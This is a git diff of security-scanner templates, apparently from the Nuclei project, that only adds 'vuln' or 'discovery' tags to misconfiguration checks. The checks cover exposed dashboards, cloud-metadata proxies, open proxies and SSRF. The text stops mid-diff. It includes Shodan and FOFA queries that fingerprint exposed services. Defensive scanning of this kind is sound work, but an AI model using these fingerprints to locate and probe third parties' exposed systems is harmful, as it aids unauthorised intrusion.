http(1) && http(2) http: diff --git a/http/misconfiguration/node-express-status.yaml b/http/misconfiguration/node-express-status.yaml index 299b11311b1..1fd7355b929 100644 --- a/http/misconfiguration/node-express-status.yaml +++ b/http/misconfiguration/node-express-status.yaml @@ -10,7 +10,7 @@ info: max-request: 1 shodan-query: title:"Express Status" fofa-query: title="Express Status" - tags: node,express,misconfig,status + tags: node,express,misconfig,status,vuln http: - method: GET diff --git a/http/misconfiguration/nomad-jobs.yaml b/http/misconfiguration/nomad-jobs.yaml index d243b96aedd..2e4d4d6b53e 100644 --- a/http/misconfiguration/nomad-jobs.yaml +++ b/http/misconfiguration/nomad-jobs.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: nomad,devops,hashicorp,panel,misconfig + tags: nomad,devops,hashicorp,panel,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/ntfy-web-exposure.yaml b/http/misconfiguration/ntfy-web-exposure.yaml index 934bd573e93..7641f1d3de4 100644 --- a/http/misconfiguration/ntfy-web-exposure.yaml +++ b/http/misconfiguration/ntfy-web-exposure.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: html:"ntfy.sh" - tags: exposure,ntfy,web,misconfig + tags: exposure,ntfy,web,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/ntop-panel-exposed.yaml b/http/misconfiguration/ntop-panel-exposed.yaml index e92f4fded0d..9114df83f1f 100644 --- a/http/misconfiguration/ntop-panel-exposed.yaml +++ b/http/misconfiguration/ntop-panel-exposed.yaml @@ -12,7 +12,7 @@ info: vendor: ntop product: ntopng shodan-query: title:"Configure ntop" - tags: misconfig,ntop,exposure + tags: misconfig,ntop,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/ntopng-traffic-dashboard.yaml b/http/misconfiguration/ntopng-traffic-dashboard.yaml index 255e24add40..9c9cd9d0ce2 100644 --- a/http/misconfiguration/ntopng-traffic-dashboard.yaml +++ b/http/misconfiguration/ntopng-traffic-dashboard.yaml @@ -16,7 +16,7 @@ info: shodan-query: http.title:"ntopng - Traffic Dashboard" product: ntopng vendor: ntop - tags: misconfig,ntopng,dashboard + tags: misconfig,ntopng,dashboard,discovery http: - method: GET diff --git a/http/misconfiguration/odoo-unprotected-database.yaml b/http/misconfiguration/odoo-unprotected-database.yaml index 2d997db7255..143ae8fc456 100644 --- a/http/misconfiguration/odoo-unprotected-database.yaml +++ b/http/misconfiguration/odoo-unprotected-database.yaml @@ -16,7 +16,7 @@ info: vendor: odoo product: odoo shodan-query: title:"Odoo" - tags: odoo,database,unauth,misconfig + tags: odoo,database,unauth,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/office365-open-redirect.yaml b/http/misconfiguration/office365-open-redirect.yaml index 74260959c01..48919efa224 100644 --- a/http/misconfiguration/office365-open-redirect.yaml +++ b/http/misconfiguration/office365-open-redirect.yaml @@ -14,7 +14,7 @@ info: cwe-id: CWE-601 metadata: max-request: 1 - tags: redirect,office365,microsoft,misconfig,intrusive + tags: redirect,office365,microsoft,misconfig,intrusive,vuln http: - method: GET diff --git a/http/misconfiguration/oneinstack-control-center.yaml b/http/misconfiguration/oneinstack-control-center.yaml index edeb13a79d0..c47fee5feea 100644 --- a/http/misconfiguration/oneinstack-control-center.yaml +++ b/http/misconfiguration/oneinstack-control-center.yaml @@ -17,7 +17,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"OneinStack" - tags: misconfig,exposure,panel,oneinstack + tags: misconfig,exposure,panel,oneinstack,vuln http: - method: GET diff --git a/http/misconfiguration/openbmcs/openbmcs-secret-disclosure.yaml b/http/misconfiguration/openbmcs/openbmcs-secret-disclosure.yaml index 86789ee3dde..322b429e477 100644 --- a/http/misconfiguration/openbmcs/openbmcs-secret-disclosure.yaml +++ b/http/misconfiguration/openbmcs/openbmcs-secret-disclosure.yaml @@ -14,7 +14,7 @@ info: metadata: max-request: 1 shodan-query: http.favicon.hash:1550906681 - tags: misconfig,edb,openbmcs + tags: misconfig,edb,openbmcs,vuln http: - method: GET diff --git a/http/misconfiguration/openbmcs/openbmcs-ssrf.yaml b/http/misconfiguration/openbmcs/openbmcs-ssrf.yaml index 0d118e9ed6d..7b4dfdc4741 100644 --- a/http/misconfiguration/openbmcs/openbmcs-ssrf.yaml +++ b/http/misconfiguration/openbmcs/openbmcs-ssrf.yaml @@ -15,7 +15,7 @@ info: metadata: max-request: 1 shodan-query: http.favicon.hash:1550906681 - tags: ssrf,oast,openbmcs,edb,misconfig + tags: ssrf,oast,openbmcs,edb,misconfig,vuln http: - raw: diff --git a/http/misconfiguration/opensearch-dashboard-unauth.yaml b/http/misconfiguration/opensearch-dashboard-unauth.yaml index 2ead4152d50..82730ca36fc 100644 --- a/http/misconfiguration/opensearch-dashboard-unauth.yaml +++ b/http/misconfiguration/opensearch-dashboard-unauth.yaml @@ -13,7 +13,7 @@ info: max-request: 1 shodan-query: title:"OpenSearch" fofa-query: title="OpenSearch" - tags: opensearch,dashboard,misconfig,unauth + tags: opensearch,dashboard,misconfig,unauth,vuln http: - raw: diff --git a/http/misconfiguration/openstack-config.yaml b/http/misconfiguration/openstack-config.yaml index c174b4a4a2d..30b324f9eda 100644 --- a/http/misconfiguration/openstack-config.yaml +++ b/http/misconfiguration/openstack-config.yaml @@ -15,7 +15,7 @@ info: vendor: openstack product: swift shodan-query: http.favicon.hash:786533217 - tags: exposure,misconfig,openstack + tags: exposure,misconfig,openstack,vuln http: - method: GET diff --git a/http/misconfiguration/oracle-reports-services.yaml b/http/misconfiguration/oracle-reports-services.yaml index 81d1669acd3..a4f32214c27 100644 --- a/http/misconfiguration/oracle-reports-services.yaml +++ b/http/misconfiguration/oracle-reports-services.yaml @@ -13,7 +13,7 @@ info: vendor: oracle product: reports shodan-query: title:"Oracle Forms" - tags: exposure,oracle,misconfig + tags: exposure,oracle,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/pa11y-dashboard.yaml b/http/misconfiguration/pa11y-dashboard.yaml index 5a73aaf238d..55a17ca426e 100644 --- a/http/misconfiguration/pa11y-dashboard.yaml +++ b/http/misconfiguration/pa11y-dashboard.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 shodan-query: title:"Pa11y Dashboard" - tags: misconfig,exposure,pa11y + tags: misconfig,exposure,pa11y,discovery http: - method: GET diff --git a/http/misconfiguration/pcdn-cache-node.yaml b/http/misconfiguration/pcdn-cache-node.yaml index 3798aada479..4605c605362 100644 --- a/http/misconfiguration/pcdn-cache-node.yaml +++ b/http/misconfiguration/pcdn-cache-node.yaml @@ -13,7 +13,7 @@ info: vendor: cache-base_project product: cache-base shodan-query: title:"PCDN Cache Node Dataset" - tags: node,pcdn,misconfig + tags: node,pcdn,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/pcoweb-unauth.yaml b/http/misconfiguration/pcoweb-unauth.yaml index 9bc9bb98da6..21bbcca1864 100644 --- a/http/misconfiguration/pcoweb-unauth.yaml +++ b/http/misconfiguration/pcoweb-unauth.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: title:"pCOWeb" - tags: pcoweb,unauth,misconfig,exposure + tags: pcoweb,unauth,misconfig,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/perfsonar-toolkit.yaml b/http/misconfiguration/perfsonar-toolkit.yaml index b6fc2ed8cf4..e10377ca9fd 100644 --- a/http/misconfiguration/perfsonar-toolkit.yaml +++ b/http/misconfiguration/perfsonar-toolkit.yaml @@ -15,7 +15,7 @@ info: vendor: perfsonar product: perfsonar shodan-query: title:"perfSONAR" - tags: misconfig,perfsonar,toolkit + tags: misconfig,perfsonar,toolkit,vuln http: - method: GET diff --git a/http/misconfiguration/pghero-dashboard-exposure.yaml b/http/misconfiguration/pghero-dashboard-exposure.yaml index 766c4cd03a7..0dea0cc5aec 100644 --- a/http/misconfiguration/pghero-dashboard-exposure.yaml +++ b/http/misconfiguration/pghero-dashboard-exposure.yaml @@ -18,7 +18,7 @@ info: shodan-query: title:"PgHero" product: pghero vendor: pghero_project - tags: exposure,panel,pghero,misconfig + tags: exposure,panel,pghero,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/pgwatch2-db-exposure.yaml b/http/misconfiguration/pgwatch2-db-exposure.yaml index 1fda2f1c264..c5f9631a420 100644 --- a/http/misconfiguration/pgwatch2-db-exposure.yaml +++ b/http/misconfiguration/pgwatch2-db-exposure.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: title:"Pgwatch2" - tags: dashboard,exposure,pgwatch2,unauth + tags: dashboard,exposure,pgwatch2,unauth,vuln http: - method: GET diff --git a/http/misconfiguration/photoprism-unauth.yaml b/http/misconfiguration/photoprism-unauth.yaml index b88104d1f11..01b3e64e7f4 100644 --- a/http/misconfiguration/photoprism-unauth.yaml +++ b/http/misconfiguration/photoprism-unauth.yaml @@ -13,7 +13,7 @@ info: max-request: 1 shodan-query: title:"PhotoPrism" fofa-query: title="PhotoPrism" - tags: photoprism,misconfig,unauth + tags: photoprism,misconfig,unauth,vuln http: - raw: diff --git a/http/misconfiguration/php-debugbar-exposure.yaml b/http/misconfiguration/php-debugbar-exposure.yaml index 9a7500f7fd6..f580fc84dd2 100644 --- a/http/misconfiguration/php-debugbar-exposure.yaml +++ b/http/misconfiguration/php-debugbar-exposure.yaml @@ -14,7 +14,7 @@ info: verified: true max-request: 2 shodan-query: html:"phpdebugbar" - tags: misconfig,php,phpdebug,exposure,debug + tags: misconfig,php,phpdebug,exposure,debug,vuln http: - method: GET diff --git a/http/misconfiguration/php-errors.yaml b/http/misconfiguration/php-errors.yaml index 7062fe93add..993f25a01d0 100644 --- a/http/misconfiguration/php-errors.yaml +++ b/http/misconfiguration/php-errors.yaml @@ -11,7 +11,7 @@ info: vendor: php product: php shodan-query: http.title:"PHP warning" || "Fatal error" - tags: debug,php,misconfig + tags: debug,php,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/php-fpm-status.yaml b/http/misconfiguration/php-fpm-status.yaml index 6565f19ee9a..ba6ecb3c378 100644 --- a/http/misconfiguration/php-fpm-status.yaml +++ b/http/misconfiguration/php-fpm-status.yaml @@ -6,7 +6,7 @@ info: severity: unknown metadata: max-request: 1 - tags: config,misconfig + tags: config,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/php-src-disclosure.yaml b/http/misconfiguration/php-src-disclosure.yaml index d64a7e6233e..7ee47427e21 100644 --- a/http/misconfiguration/php-src-disclosure.yaml +++ b/http/misconfiguration/php-src-disclosure.yaml @@ -14,7 +14,7 @@ info: cwe-id: CWE-540 metadata: max-request: 2 - tags: php,phpcli,diclosure,misconfig + tags: php,phpcli,diclosure,misconfig,vuln http: - raw: diff --git a/http/misconfiguration/php/php-composer-binary.yaml b/http/misconfiguration/php/php-composer-binary.yaml index b79cbd59ee4..18cfb81b5a9 100644 --- a/http/misconfiguration/php/php-composer-binary.yaml +++ b/http/misconfiguration/php/php-composer-binary.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: php,composer,exposure,misconfig + tags: php,composer,exposure,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/phpcli-stack-trace.yaml b/http/misconfiguration/phpcli-stack-trace.yaml index 15babc72e76..ef9c3d484f7 100644 --- a/http/misconfiguration/phpcli-stack-trace.yaml +++ b/http/misconfiguration/phpcli-stack-trace.yaml @@ -12,7 +12,7 @@ info: vendor: php product: php shodan-query: The requested resource - tags: misconfig,phpcli,intrusive + tags: misconfig,phpcli,intrusive,vuln http: - method: GET diff --git a/http/misconfiguration/phpmemcached-admin-panel.yaml b/http/misconfiguration/phpmemcached-admin-panel.yaml index 55baa223770..123bad88ee8 100644 --- a/http/misconfiguration/phpmemcached-admin-panel.yaml +++ b/http/misconfiguration/phpmemcached-admin-panel.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 shodan-query: title:"phpMemcachedAdmin" - tags: phpmemcached,exposure,misconfig + tags: phpmemcached,exposure,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/phpmyadmin/phpmyadmin-misconfiguration.yaml b/http/misconfiguration/phpmyadmin/phpmyadmin-misconfiguration.yaml index 21c96c65565..024d6db3b1a 100644 --- a/http/misconfiguration/phpmyadmin/phpmyadmin-misconfiguration.yaml +++ b/http/misconfiguration/phpmyadmin/phpmyadmin-misconfiguration.yaml @@ -24,7 +24,7 @@ info: fofa-query: - body="pma_servername" && body="4.8.4" - title="phpmyadmin" - tags: phpmyadmin,misconfig,edb + tags: phpmyadmin,misconfig,edb,vuln flow: http(1) || http(2) diff --git a/http/misconfiguration/phpmyadmin/phpmyadmin-server-import.yaml b/http/misconfiguration/phpmyadmin/phpmyadmin-server-import.yaml index f1c459ef655..93019099e95 100644 --- a/http/misconfiguration/phpmyadmin/phpmyadmin-server-import.yaml +++ b/http/misconfiguration/phpmyadmin/phpmyadmin-server-import.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 10 - tags: phpmyadmin,misconfig + tags: phpmyadmin,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml b/http/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml index 7b8779dfcf7..f54c2868f96 100644 --- a/http/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml +++ b/http/misconfiguration/phpmyadmin/phpmyadmin-setup.yaml @@ -16,7 +16,7 @@ info: shodan-query: http.html:"phpMyAdmin" product: phpmyadmin vendor: phpmyadmin - tags: phpmyadmin,misconfig + tags: phpmyadmin,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/phpnow-works.yaml b/http/misconfiguration/phpnow-works.yaml index bbf71ba038f..c09ef14ec0b 100644 --- a/http/misconfiguration/phpnow-works.yaml +++ b/http/misconfiguration/phpnow-works.yaml @@ -11,7 +11,7 @@ info: verified: true max-request: 1 shodan-query: "PHPnow works" - tags: misconfig,phpnow,exposure + tags: misconfig,phpnow,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/pinpoint-unauth.yaml b/http/misconfiguration/pinpoint-unauth.yaml index 70081623cf2..e8fb08db1c9 100644 --- a/http/misconfiguration/pinpoint-unauth.yaml +++ b/http/misconfiguration/pinpoint-unauth.yaml @@ -9,7 +9,7 @@ info: - https://github.com/pinpoint-apm/pinpoint metadata: max-request: 1 - tags: pippoint,unauth,misconfig + tags: pippoint,unauth,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/portal-api-ssrf.yaml b/http/misconfiguration/portal-api-ssrf.yaml index e5edfd64d64..ca1e62e625f 100644 --- a/http/misconfiguration/portal-api-ssrf.yaml +++ b/http/misconfiguration/portal-api-ssrf.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 fofa-query: body="/_proxy/api/v3/" - tags: ssrf,api,portal,http + tags: ssrf,api,portal,http,vuln http: - raw: diff --git a/http/misconfiguration/postgres-exporter-metrics.yaml b/http/misconfiguration/postgres-exporter-metrics.yaml index 18fec06f07b..cd075123ca3 100644 --- a/http/misconfiguration/postgres-exporter-metrics.yaml +++ b/http/misconfiguration/postgres-exporter-metrics.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 shodan-query: title:"Postgres exporter" - tags: postgres,exposure,debug,misconfig + tags: postgres,exposure,debug,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/private-key-exposure.yaml b/http/misconfiguration/private-key-exposure.yaml index 570b89ed6d7..baa5fe2fb7c 100644 --- a/http/misconfiguration/private-key-exposure.yaml +++ b/http/misconfiguration/private-key-exposure.yaml @@ -7,7 +7,7 @@ info: description: Searches for private key exposure by attempting to query the helper endpoint on node_modules metadata: max-request: 1 - tags: exposure,node,misconfig + tags: exposure,node,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/prometheus-promtail.yaml b/http/misconfiguration/prometheus-promtail.yaml index 3905fa36157..0e7ea140739 100644 --- a/http/misconfiguration/prometheus-promtail.yaml +++ b/http/misconfiguration/prometheus-promtail.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:932345713 - tags: misconfig,prometheus,promtail,exposure + tags: misconfig,prometheus,promtail,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/prometheus/prometheus-config.yaml b/http/misconfiguration/prometheus/prometheus-config.yaml index dc0d7b6aece..2b5a0b6b4bf 100644 --- a/http/misconfiguration/prometheus/prometheus-config.yaml +++ b/http/misconfiguration/prometheus/prometheus-config.yaml @@ -9,7 +9,7 @@ info: - https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/ metadata: max-request: 1 - tags: prometheus,config,misconfig + tags: prometheus,config,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/prometheus/prometheus-exporter.yaml b/http/misconfiguration/prometheus/prometheus-exporter.yaml index 1ee9675724a..94e761e35c4 100644 --- a/http/misconfiguration/prometheus/prometheus-exporter.yaml +++ b/http/misconfiguration/prometheus/prometheus-exporter.yaml @@ -9,7 +9,7 @@ info: - https://github.com/prometheus/prometheus/wiki/Default-port-allocations metadata: max-request: 1 - tags: prometheus,misconfig + tags: prometheus,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/prometheus/prometheus-flags.yaml b/http/misconfiguration/prometheus/prometheus-flags.yaml index 31a43808ee3..183324f33fc 100644 --- a/http/misconfiguration/prometheus/prometheus-flags.yaml +++ b/http/misconfiguration/prometheus/prometheus-flags.yaml @@ -9,7 +9,7 @@ info: - https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/ metadata: max-request: 1 - tags: prometheus,leak,misconfig + tags: prometheus,leak,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/prometheus/prometheus-log.yaml b/http/misconfiguration/prometheus/prometheus-log.yaml index a0545d03fda..35673160948 100644 --- a/http/misconfiguration/prometheus/prometheus-log.yaml +++ b/http/misconfiguration/prometheus/prometheus-log.yaml @@ -7,7 +7,7 @@ info: description: Prometheus instance is exposed. metadata: max-request: 3 - tags: prometheus,misconfig + tags: prometheus,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/prometheus/prometheus-targets.yaml b/http/misconfiguration/prometheus/prometheus-targets.yaml index 638bb5bc939..942ae96823d 100644 --- a/http/misconfiguration/prometheus/prometheus-targets.yaml +++ b/http/misconfiguration/prometheus/prometheus-targets.yaml @@ -9,7 +9,7 @@ info: - https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/ metadata: max-request: 1 - tags: prometheus,misconfig + tags: prometheus,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/prometheus/prometheus-unauth.yaml b/http/misconfiguration/prometheus/prometheus-unauth.yaml index 33136e32cb4..eb0ece17eb4 100644 --- a/http/misconfiguration/prometheus/prometheus-unauth.yaml +++ b/http/misconfiguration/prometheus/prometheus-unauth.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 2 shodan-query: http.title:"Prometheus Time Series" - tags: unauth,prometheus,misconfig + tags: unauth,prometheus,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/prowlarr-dashboard-unauth.yaml b/http/misconfiguration/prowlarr-dashboard-unauth.yaml index 3ba3b548862..9a1fe8885fc 100644 --- a/http/misconfiguration/prowlarr-dashboard-unauth.yaml +++ b/http/misconfiguration/prowlarr-dashboard-unauth.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: html:"prowlarr" - tags: prowlarr,dashboard,unauth,misconfig + tags: prowlarr,dashboard,unauth,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/proxy/metadata-alibaba.yaml b/http/misconfiguration/proxy/metadata-alibaba.yaml index 63bd7e1db86..527016e6381 100644 --- a/http/misconfiguration/proxy/metadata-alibaba.yaml +++ b/http/misconfiguration/proxy/metadata-alibaba.yaml @@ -23,7 +23,7 @@ info: cwe-id: CWE-441 metadata: max-request: 4 - tags: exposure,config,alibaba,proxy,misconfig,metadata + tags: exposure,config,alibaba,proxy,misconfig,metadata,vuln http: - raw: diff --git a/http/misconfiguration/proxy/metadata-aws.yaml b/http/misconfiguration/proxy/metadata-aws.yaml index 05972aa969e..9cee51d64f3 100644 --- a/http/misconfiguration/proxy/metadata-aws.yaml +++ b/http/misconfiguration/proxy/metadata-aws.yaml @@ -25,7 +25,7 @@ info: cwe-id: CWE-441 metadata: max-request: 4 - tags: exposure,proxy,aws,amazon,misconfig,metadata + tags: exposure,proxy,aws,amazon,misconfig,metadata,vuln http: - raw: diff --git a/http/misconfiguration/proxy/metadata-azure.yaml b/http/misconfiguration/proxy/metadata-azure.yaml index f6a5ce4633f..dcc633a77b8 100644 --- a/http/misconfiguration/proxy/metadata-azure.yaml +++ b/http/misconfiguration/proxy/metadata-azure.yaml @@ -23,7 +23,7 @@ info: cwe-id: CWE-441 metadata: max-request: 2 - tags: exposure,config,azure,microsoft,proxy,misconfig,metadata + tags: exposure,config,azure,microsoft,proxy,misconfig,metadata,vuln http: - raw: diff --git a/http/misconfiguration/proxy/metadata-digitalocean.yaml b/http/misconfiguration/proxy/metadata-digitalocean.yaml index b0cabf82d60..487b106713d 100644 --- a/http/misconfiguration/proxy/metadata-digitalocean.yaml +++ b/http/misconfiguration/proxy/metadata-digitalocean.yaml @@ -23,7 +23,7 @@ info: cwe-id: CWE-441 metadata: max-request: 2 - tags: exposure,config,digitalocean,proxy,misconfig,metadata + tags: exposure,config,digitalocean,proxy,misconfig,metadata,vuln http: - raw: diff --git a/http/misconfiguration/proxy/metadata-google.yaml b/http/misconfiguration/proxy/metadata-google.yaml index a7fd108ec08..265849a4082 100644 --- a/http/misconfiguration/proxy/metadata-google.yaml +++ b/http/misconfiguration/proxy/metadata-google.yaml @@ -23,7 +23,7 @@ info: cwe-id: CWE-441 metadata: max-request: 2 - tags: exposure,config,google,gcp,proxy,misconfig,metadata + tags: exposure,config,google,gcp,proxy,misconfig,metadata,vuln http: - raw: diff --git a/http/misconfiguration/proxy/metadata-hetzner.yaml b/http/misconfiguration/proxy/metadata-hetzner.yaml index c44077ed5e8..b718aef6048 100644 --- a/http/misconfiguration/proxy/metadata-hetzner.yaml +++ b/http/misconfiguration/proxy/metadata-hetzner.yaml @@ -23,7 +23,7 @@ info: cwe-id: CWE-441 metadata: max-request: 2 - tags: exposure,config,hetzner,proxy,misconfig,metadata + tags: exposure,config,hetzner,proxy,misconfig,metadata,vuln http: - raw: diff --git a/http/misconfiguration/proxy/metadata-openstack.yaml b/http/misconfiguration/proxy/metadata-openstack.yaml index b70fd2cfc59..206ce45da86 100644 --- a/http/misconfiguration/proxy/metadata-openstack.yaml +++ b/http/misconfiguration/proxy/metadata-openstack.yaml @@ -22,7 +22,7 @@ info: cwe-id: CWE-441 metadata: max-request: 2 - tags: exposure,config,openstack,proxy,misconfig,metadata + tags: exposure,config,openstack,proxy,misconfig,metadata,vuln http: - raw: diff --git a/http/misconfiguration/proxy/metadata-oracle.yaml b/http/misconfiguration/proxy/metadata-oracle.yaml index c9ad711a9a8..88eb67b3933 100644 --- a/http/misconfiguration/proxy/metadata-oracle.yaml +++ b/http/misconfiguration/proxy/metadata-oracle.yaml @@ -23,7 +23,7 @@ info: cwe-id: CWE-441 metadata: max-request: 2 - tags: exposure,config,oracle,proxy,misconfig,metadata + tags: exposure,config,oracle,proxy,misconfig,metadata,vuln http: - raw: diff --git a/http/misconfiguration/proxy/open-proxy-external.yaml b/http/misconfiguration/proxy/open-proxy-external.yaml index 71f7436f3b1..1def1f0830b 100644 --- a/http/misconfiguration/proxy/open-proxy-external.yaml +++ b/http/misconfiguration/proxy/open-proxy-external.yaml @@ -15,7 +15,7 @@ info: cwe-id: CWE-441 metadata: max-request: 3 - tags: exposure,config,proxy,misconfig + tags: exposure,config,proxy,misconfig,vuln http: - raw: diff --git a/http/misconfiguration/proxy/open-proxy-internal.yaml b/http/misconfiguration/proxy/open-proxy-internal.yaml index e8bed0b17a2..7fbb2577e2f 100644 --- a/http/misconfiguration/proxy/open-proxy-internal.yaml +++ b/http/misconfiguration/proxy/open-proxy-internal.yaml @@ -16,7 +16,7 @@ info: cwe-id: CWE-441 metadata: max-request: 25 - tags: exposure,config,proxy,misconfig,fuzz + tags: exposure,config,proxy,misconfig,fuzz,vuln http: - raw: diff --git a/http/misconfiguration/proxy/open-proxy-localhost.yaml b/http/misconfiguration/proxy/open-proxy-localhost.yaml index e07fd2c6a01..6ed7cb81b2f 100644 --- a/http/misconfiguration/proxy/open-proxy-localhost.yaml +++ b/http/misconfiguration/proxy/open-proxy-localhost.yaml @@ -16,7 +16,7 @@ info: cwe-id: CWE-441 metadata: max-request: 6 - tags: exposure,config,proxy,misconfig,fuzz + tags: exposure,config,proxy,misconfig,fuzz,vuln http: - raw: diff --git a/http/misconfiguration/proxy/open-proxy-portscan.yaml b/http/misconfiguration/proxy/open-proxy-portscan.yaml index 302ec09a6e2..5d2fb0ee498 100644 --- a/http/misconfiguration/proxy/open-proxy-portscan.yaml +++ b/http/misconfiguration/proxy/open-proxy-portscan.yaml @@ -16,7 +16,7 @@ info: cwe-id: CWE-441 metadata: max-request: 8 - tags: exposure,config,proxy,misconfig,fuzz + tags: exposure,config,proxy,misconfig,fuzz,vuln http: - raw: diff --git a/http/misconfiguration/puppetdb-dashboard.yaml b/http/misconfiguration/puppetdb-dashboard.yaml index db11d47a4ef..123cf314bc9 100644 --- a/http/misconfiguration/puppetdb-dashboard.yaml +++ b/http/misconfiguration/puppetdb-dashboard.yaml @@ -16,7 +16,7 @@ info: shodan-query: 'title:"PuppetDB: Dashboard"' product: puppetdb vendor: puppet - tags: misconfig,exposure,puppetdb + tags: misconfig,exposure,puppetdb,discovery http: - method: GET diff --git a/http/misconfiguration/put-method-enabled.yaml b/http/misconfiguration/put-method-enabled.yaml index 1e1d590db89..e7b598412ac 100644 --- a/http/misconfiguration/put-method-enabled.yaml +++ b/http/misconfiguration/put-method-enabled.yaml @@ -9,7 +9,7 @@ info: - https://portswigger.net/kb/issues/00100900_http-put-method-is-enabled metadata: max-request: 2 - tags: injection,misconfig,intrusive + tags: injection,misconfig,intrusive,vuln http: - raw: diff --git a/http/misconfiguration/python-metrics.yaml b/http/misconfiguration/python-metrics.yaml index 64dc720acf5..e66dc13cde3 100644 --- a/http/misconfiguration/python-metrics.yaml +++ b/http/misconfiguration/python-metrics.yaml @@ -14,7 +14,7 @@ info: vendor: python product: python shodan-query: html:"python_gc_objects_collected_total" - tags: exposure,devops,python,misconfig + tags: exposure,devops,python,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/questdb-console.yaml b/http/misconfiguration/questdb-console.yaml index 1dfc9265868..81970ad387c 100644 --- a/http/misconfiguration/questdb-console.yaml +++ b/http/misconfiguration/questdb-console.yaml @@ -15,7 +15,7 @@ info: verified: true max-request: 1 shodan-query: title:"QuestDB · Console" - tags: misconfig,questdb,exposure + tags: misconfig,questdb,exposure,vuln http: - method: GET diff --git a/http/misconfiguration/qvidium-management-system-exposed.yaml b/http/misconfiguration/qvidium-management-system-exposed.yaml index d0a32cd25f2..d697fcce89b 100644 --- a/http/misconfiguration/qvidium-management-system-exposed.yaml +++ b/http/misconfiguration/qvidium-management-system-exposed.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 shodan-query: html:"QVidium Management" - tags: misconfig,qvidium + tags: misconfig,qvidium,vuln http: - method: GET diff --git a/http/misconfiguration/rabbitmq-exporter-metrics.yaml b/http/misconfiguration/rabbitmq-exporter-metrics.yaml index f22f5e0d9af..501dc4d382d 100644 --- a/http/misconfiguration/rabbitmq-exporter-metrics.yaml +++ b/http/misconfiguration/rabbitmq-exporter-metrics.yaml @@ -13,7 +13,7 @@ info: vendor: vmware product: rabbitmq shodan-query: title:"RabbitMQ Exporter" - tags: rabbitmq,exposure,debug,misconfig + tags: rabbitmq,exposure,debug,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/rack-mini-profiler.yaml b/http/misconfiguration/rack-mini-profiler.yaml index b34faa16ea7..7ab90808d5b 100644 --- a/http/misconfiguration/rack-mini-profiler.yaml +++ b/http/misconfiguration/rack-mini-profiler.yaml @@ -7,7 +7,7 @@ info: description: rack-mini-profiler is prone to environmental information disclosure which could help an attacker formulate additional attacks. metadata: max-request: 1 - tags: config,debug,rails,misconfig + tags: config,debug,rails,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/radarr-dashboard-unauth.yaml b/http/misconfiguration/radarr-dashboard-unauth.yaml index dcfbafbd6d1..ee4354f6064 100644 --- a/http/misconfiguration/radarr-dashboard-unauth.yaml +++ b/http/misconfiguration/radarr-dashboard-unauth.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: html:"radarr" - tags: radarr,dashboard,unauth,misconfig + tags: radarr,dashboard,unauth,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/ray-dashboard.yaml b/http/misconfiguration/ray-dashboard.yaml index 48af59737cf..8a63d7ac9f7 100644 --- a/http/misconfiguration/ray-dashboard.yaml +++ b/http/misconfiguration/ray-dashboard.yaml @@ -18,7 +18,7 @@ info: fofa-query: - icon_hash=463802404 - body="ray dashboard" - tags: misconfig,exposure,ray + tags: misconfig,exposure,ray,discovery http: - method: GET diff --git a/http/misconfiguration/readarr-dashboard-unauth.yaml b/http/misconfiguration/readarr-dashboard-unauth.yaml index e3cfa533323..7c0eef68cd8 100644 --- a/http/misconfiguration/readarr-dashboard-unauth.yaml +++ b/http/misconfiguration/readarr-dashboard-unauth.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: html:"readarr" - tags: readarr,dashboard,unauth,misconfig + tags: readarr,dashboard,unauth,misconfig,vuln http: - method: GET diff --git a/http/misconfiguration/redpanda-console.yaml b/http/misconfiguration/redpanda-console.yaml index 